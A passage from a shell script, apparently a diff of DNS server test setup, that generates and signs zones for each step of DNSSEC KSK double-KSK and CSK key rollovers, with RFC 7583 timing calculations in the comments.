$DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at ksk-doubleksk.autosign represent the various steps of a KSK +# Double-KSK rollover. +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.ksk-doubleksk.autosign +TactN="now" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# It is time to submit the introduce the new KSK. +setup step2.ksk-doubleksk.autosign +# According to RFC 7583: +# +# Tpub(N+1) <= Tact(N) + Lksk - Dreg - IpubC +# IpubC = DprpC + TTLkey (+publish-safety) +# +# |1| |2| |3| |4| +# | | | | +# Key N |<-IpubC->|<--->|<-Dreg->|<-----Lksk--- - - +# | | | | +# Key N+1 | | | | +# | | | | +# Key N Tpub Trdy Tsbm Tact +# Key N+1 +# +# (continued ...) +# +# |5| |6| |7| |8| |9| |10| +# | | | | | | +# Key N - - --------------Lksk------->|<-Iret->|<----->| +# | | | | | | +# Key N+1 |<-IpubC->|<--->|<-Dreg->|<--------Lksk----- - - +# | | | | | | +# Key N Tret Tdea Trem +# Key N+1 Tpub Trdy Tsbm Tact +# +# Tnow +# +# Lksk: 60d +# Dreg: 1d +# DprpC: 1h +# TTLkey: 2h +# publish-safety: 1d +# IpubC: 27h +# +# Tact(N) = Tnow - Lksk + Dreg + IpubC = now - 60d + 27h +# = now - 1440h + 27h = now - 1413h +TactN="now-1413h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN "$KSK" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.2 2>&1 +cat template.db.in "${KSK}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# It is time to submit the DS. +setup step3.ksk-doubleksk.autosign +# According to RFC 7583: +# +# Tsbm(N+1) >= Trdy(N+1) +# Tact(N+1) = Tsbm(N+1) + Dreg +# Iret = DprpP + TTLds (+retire-safety) +# +# |5| |6| |7| |8| |9| |10| +# | | | | | | +# Key N - - --------------Lksk------->|<-Iret->|<----->| +# | | | | | | +# Key N+1 |<-IpubC->|<--->|<-Dreg->|<--------Lksk----- - - +# | | | | | | +# Key N Tret Tdea Trem +# Key N+1 Tpub Trdy Tsbm Tact +# +# Tnow +# +# Lksk: 60d +# Dreg: N/A +# DprpP: 1h +# TTLds: 1h +# retire-safety: 2d +# Iret: 50h +# DprpC: 1h +# TTLkey: 2h +# publish-safety: 1d +# IpubC: 27h +# +# Tact(N) = Tnow + Lksk = now - 60d = now - 60d +# Tret(N) = now +# Trem(N) = Tnow + Iret = now + 50h +# Tpub(N+1) = Tnow - IpubC = now - 27h +# Tsbm(N+1) = now +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow + Lksk = now + 60d +# Trem(N+1) = Tnow + Lksk + Iret = now + 60d + 50h +# = now + 1440h + 50h = 1490h +TactN="now-60d" +TretN="now" +TremN="now+50h" +TpubN1="now-27h" +TsbmN1="now" +TactN1="${TretN}" +TretN1="now+60d" +TremN1="now+1490h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TactN1} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 "$KSK2" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $KSK1 $KSK2 +# Sign zone. +cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# The DS should be swapped now. +setup step4.ksk-doubleksk.autosign +# According to RFC 7583: +# +# Tret(N) = Tsbm(N+1) +# Tdea(N) = Tret(N) + Iret +# Tact(N+1) = Tret(N) +# +# |5| |6| |7| |8| |9| |10| +# | | | | | | +# Key N - - --------------Lksk------->|<-Iret->|<----->| +# | | | | | | +# Key N+1 |<-IpubC->|<--->|<-Dreg->|<--------Lksk----- - - +# | | | | | | +# Key N Tret Tdea Trem +# Key N+1 Tpub Trdy Tsbm Tact +# +# Tnow +# +# Lksk: 60d +# Dreg: N/A +# Iret: 50h +# +# Tact(N) = Tnow - Lksk - Iret = now - 60d - 50h +# = now - 1440h - 50h = now - 1490h +# Tret(N) = Tnow - Iret = now - 50h +# Trem(N) = Tnow +# Tpub(N+1) = Tnow - Iret - IpubC = now - 50h - 27h +# = now - 77h +# Tsbm(N+1) = Tnow - Iret = now - 50h +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow + Lksk - Iret = now + 60d - 50h = now + 1390h +# Trem(N+1) = Tnow + Lksk = now + 60d +TactN="now-1490h" +TretN="now-50h" +TremN="now" +TpubN1="now-77h" +TsbmN1="now-50h" +TactN1="${TretN}" +TretN1="now+1390h" +TremN1="now+60d" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TretN} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $U $TsbmN1 -D ds $TsbmN1 "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $R $TsbmN1 -P ds $TsbmN1 "$KSK2" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $KSK1 $KSK2 +# Sign zone. +cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# The predecessor DNSKEY is removed long enough that is has become HIDDEN. +setup step5.ksk-doubleksk.autosign +# Subtract DNSKEY TTL from all the times (2h). +# Tact(N) = now - 1490h - 2h = now - 1492h +# Tret(N) = now - 50h - 2h = now - 52h +# Trem(N) = now - 2h +# Tpub(N+1) = now - 77h - 2h = now - 79h +# Tsbm(N+1) = now - 50h - 2h = now - 52h +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 1390h - 2h = now + 1388h +# Trem(N+1) = now + 60d - 2h = now + 1442h +TactN="now-1492h" +TretN="now-52h" +TremN="now-2h" +TpubN1="now-79h" +TsbmN1="now-52h" +TactN1="${TretN}" +TretN1="now+1388h" +TremN1="now+1442h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TretN} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $H -k $U $TretN -r $U $TretN -d $H $TretN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $KSK1 $KSK2 +# Sign zone. +cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# The predecessor DNSKEY can be purged. +setup step6.ksk-doubleksk.autosign +# Subtract purge-keys interval from all the times (1h). +# Tact(N) = now - 1492h - 1h = now - 1493h +# Tret(N) = now - 52h - 1h = now - 53h +# Trem(N) = now - 2h - 1h = now - 3h +# Tpub(N+1) = now - 79h - 1h = now - 80h +# Tsbm(N+1) = now - 52h - 1h = now - 53h +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 1388h - 1h = now + 1387h +# Trem(N+1) = now + 1442h - 1h = now + 1441h +TactN="now-1493h" +TretN="now-53h" +TremN="now-3h" +TpubN1="now-80h" +TsbmN1="now-53h" +TactN1="${TretN}" +TretN1="now+1387h" +TremN1="now+1441h" +ksktimes="-P ${TactN} -A ${TactN} -P sync ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -A ${TretN} -P sync ${TsbmN1} -I ${TretN1} -D ${TremN1}" +zsktimes="-P ${TactN} -A ${TactN}" +KSK1=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $ksktimes $zone 2> keygen.out.$zone.1) +KSK2=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 -f KSK $newtimes $zone 2> keygen.out.$zone.2) +ZSK=$($KEYGEN -a $DEFAULT_ALGORITHM -L 7200 $zsktimes $zone 2> keygen.out.$zone.3) +$SETTIME -s -g $H -k $H $TretN -r $H $TretN -d $H $TretN "$KSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TactN1 -r $O $TactN1 -d $O $TactN1 "$KSK2" > settime.out.$zone.2 2>&1 +$SETTIME -s -g $O -k $O $TactN -z $O $TactN "$ZSK" > settime.out.$zone.3 2>&1 +# Set key rollover relationship. +key_successor $KSK1 $KSK2 +# Sign zone. +cat template.db.in "${KSK1}.key" "${KSK2}.key" "${ZSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$KSK2" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$ZSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -x -s now-1h -e now+2w -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at csk-roll.autosign represent the various steps of a CSK rollover +# (which is essentially a ZSK Pre-Publication / KSK Double-KSK rollover). +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.csk-roll.autosign +TactN="now" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# It is time to introduce the new CSK. +setup step2.csk-roll.autosign +# According to RFC 7583: +# KSK: Tpub(N+1) <= Tact(N) + Lksk - IpubC +# ZSK: Tpub(N+1) <= Tact(N) + Lzsk - Ipub +# IpubC = DprpC + TTLkey (+publish-safety) +# Ipub = IpubC +# Lcsk = Lksk = Lzsk +# +# Lcsk: 6mo (186d, 4464h) +# Dreg: N/A +# DprpC: 1h +# TTLkey: 1h +# publish-safety: 1h +# Ipub: 3h +# +# Tact(N) = Tnow - Lcsk + Ipub = now - 186d + 3h +# = now - 4464h + 3h = now - 4461h +TactN="now-4461h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 3: +# It is time to submit the DS and to roll signatures. +setup step3.csk-roll.autosign +# According to RFC 7583: +# +# Tsbm(N+1) >= Trdy(N+1) +# KSK: Tact(N+1) = Tsbm(N+1) +# ZSK: Tact(N+1) = Tpub(N+1) + Ipub = Tsbm(N+1) +# KSK: Iret = DprpP + TTLds (+retire-safety) +# ZSK: IretZ = Dsgn + Dprp + TTLsig (+retire-safety) +# +# Lcsk: 186d +# Dprp: 1h +# DprpP: 1h +# Dreg: N/A +# Dsgn: 25d +# TTLds: 1h +# TTLsig: 1d +# retire-safety: 2h +# Iret: 4h +# IretZ: 26d3h +# Ipub: 3h +# +# Tact(N) = Tnow - Lcsk = now - 186d +# Tret(N) = now +# Trem(N) = Tnow + IretZ = now + 26d3h = now + 627h +# Tpub(N+1) = Tnow - Ipub = now - 3h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow + Lcsk = now + 186d = now + 186d +# Trem(N+1) = Tnow + Lcsk + IretZ = now + 186d + 26d3h = +# = now + 5091h +TactN="now-186d" +TretN="now" +TremN="now+627h" +TpubN1="now-3h" +TsbmN1="now" +TactN1="${TretN}" +TretN1="now+186d" +TremN1="now+5091h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $R $TpubN1 -r $R $TpubN1 -d $H $TpubN1 -z $H $TpubN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 4: +# Some time later all the ZRRSIG records should be from the new CSK, and the +# DS should be swapped. The ZRRSIG records are all replaced after IretZ +# (which is 26d3h). The DS is swapped after Iret (which is 4h). +# In other words, the DS is swapped before all zone signatures are replaced. +setup step4.csk-roll.autosign +# According to RFC 7583: +# Trem(N) = Tret(N) - Iret + IretZ +# Tnow = Tsbm(N+1) + Iret +# +# Lcsk: 186d +# Iret: 4h +# IretZ: 26d3h +# +# Tact(N) = Tnow - Iret - Lcsk = now - 4h - 186d = now - 4468h +# Tret(N) = Tnow - Iret = now - 4h = now - 4h +# Trem(N) = Tnow - Iret + IretZ = now - 4h + 26d3h +# = now + 623h +# Tpub(N+1) = Tnow - Iret - IpubC = now - 4h - 3h = now - 7h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow - Iret + Lcsk = now - 4h + 186d = now + 4460h +# Trem(N+1) = Tnow - Iret + Lcsk + IretZ = now - 4h + 186d + 26d3h +# = now + 5087h +TactN="now-4468h" +TretN="now-4h" +TremN="now+623h" +TpubN1="now-7h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4460h" +TremN1="now+5087h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $O $TactN -d $U $TsbmN1 -z $U $TsbmN1 -D ds $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $R $TsbmN1 -z $R $TsbmN1 -P ds $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 5: +# After the DS is swapped in step 4, also the KRRSIG records can be removed. +# At this time these have all become hidden. +setup step5.csk-roll.autosign +# Subtract DNSKEY TTL plus zone propagation delay from all the times (2h). +# Tact(N) = now - 4468h - 2h = now - 4470h +# Tret(N) = now - 4h - 2h = now - 6h +# Trem(N) = now + 623h - 2h = now + 621h +# Tpub(N+1) = now - 7h - 2h = now - 9h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 4460h - 2h = now + 4458h +# Trem(N+1) = now + 5087h - 2h = now + 5085h +TactN="now-4470h" +TretN="now-6h" +TremN="now+621h" +TpubN1="now-9h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+4458h" +TremN1="now+5085h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $U now-2h -d $H now-2h -z $U $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O now-2h -z $R $TactN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 6: +# After the retire interval has passed the predecessor DNSKEY can be +# removed from the zone. +setup step6.csk-roll.autosign +# According to RFC 7583: +# Trem(N) = Tret(N) + IretZ +# Tret(N) = Tact(N) + Lcsk +# +# Lcsk: 186d +# Iret: 4h +# IretZ: 26d3h +# +# Tact(N) = Tnow - IretZ - Lcsk = now - 627h - 186d +# = now - 627h - 4464h = now - 5091h +# Tret(N) = Tnow - IretZ = now - 627h +# Trem(N) = Tnow +# Tpub(N+1) = Tnow - IretZ - Ipub = now - 627h - 3h = now - 630h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = Tnow - IretZ + Lcsk = now - 627h + 186d = now + 3837h +# Trem(N+1) = Tnow + Lcsk = now + 186d +TactN="now-5091h" +TretN="now-627h" +TremN="now" +TpubN1="now-630h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+3837h" +TremN1="now+186d" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $O $TactN -r $H $TremN -d $H $TremN -z $U $TsbmN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TremN -z $R $TsbmN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 7: +# Some time later the predecessor DNSKEY enters the HIDDEN state. +setup step7.csk-roll.autosign +# Subtract DNSKEY TTL plus zone propagation delay from all the times (2h). +# Tact(N) = now - 5091h - 2h = now - 5093h +# Tret(N) = now - 627h - 2h = now - 629h +# Trem(N) = now - 2h +# Tpub(N+1) = now - 630h - 2h = now - 632h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 3837h - 2h = now + 3835h +# Trem(N+1) = now + 186d - 2h = now + 4462h +TactN="now-5093h" +TretN="now-629h" +TremN="now-2h" +TpubN1="now-632h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+3835h" +TremN1="now+4462h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $U $TremN -r $H $TremN -d $H $TremN -z $H $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TactN1 -z $O $TactN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 8: +# The predecessor DNSKEY can be purged. +setup step8.csk-roll.autosign +# Subtract purge-keys interval from all the times (1h). +# Tact(N) = now - 5093h - 1h = now - 5094h +# Tret(N) = now - 629h - 1h = now - 630h +# Trem(N) = now - 2h - 1h = now - 3h +# Tpub(N+1) = now - 632h - 1h = now - 633h +# Tsbm(N+1) = Tret(N) +# Tact(N+1) = Tret(N) +# Tret(N+1) = now + 3835h - 1h = now + 3834h +# Trem(N+1) = now + 4462h - 1h = now + 4461h +TactN="now-5094h" +TretN="now-630h" +TremN="now-3h" +TpubN1="now-633h" +TsbmN1="${TretN}" +TactN1="${TretN}" +TretN1="now+3834h" +TremN1="now+4461h" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN} -I ${TretN} -D ${TremN}" +newtimes="-P ${TpubN1} -P sync ${TsbmN1} -A ${TactN1} -I ${TretN1} -D ${TremN1}" +CSK1=$($KEYGEN -k csk-roll -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +CSK2=$($KEYGEN -k csk-roll -l policies/autosign.conf $newtimes $zone 2> keygen.out.$zone.2) +$SETTIME -s -g $H -k $H $TremN -r $H $TremN -d $H $TremN -z $H $TactN1 "$CSK1" > settime.out.$zone.1 2>&1 +$SETTIME -s -g $O -k $O $TsbmN1 -r $O $TsbmN1 -d $O $TactN1 -z $O $TactN1 "$CSK2" > settime.out.$zone.2 2>&1 +# Set key rollover relationship. +key_successor $CSK1 $CSK2 +# Sign zone. +cat template.db.in "${CSK1}.key" "${CSK2}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK1" >> "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK2" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# +# The zones at csk-roll2.autosign represent the various steps of a CSK rollover +# (which is essentially a ZSK Pre-Publication / KSK Double-KSK rollover). +# This scenario differs from the above one because the zone signatures (ZRRSIG) +# are replaced with the new key sooner than the DS is swapped. +# + +# Step 1: +# Introduce the first key. This will immediately be active. +setup step1.csk-roll2.autosign +TactN="now" +csktimes="-P ${TactN} -P sync ${TactN} -A ${TactN}" +CSK=$($KEYGEN -k csk-roll2 -l policies/autosign.conf $csktimes $zone 2> keygen.out.$zone.1) +$SETTIME -s -g $O -k $O $TactN -r $O $TactN -d $O $TactN -z $O $TactN "$CSK" > settime.out.$zone.1 2>&1 +cat template.db.in "${CSK}.key" > "$infile" +private_type_record $zone $DEFAULT_ALGORITHM_NUMBER "$CSK" >> "$infile" +cp $infile $zonefile +$SIGNER -S -z -x -s now-1h -e now+30d -o $zone -O raw -f "${zonefile}.signed" $infile > signer.out.$zone.1 2>&1 + +# Step 2: +# It is time to introduce the new CSK. +setup step2.csk-roll2.autosign +# According to RFC 7583: +# KSK: Tpub(N+1) <= Tact(N) + Lksk - IpubC +# 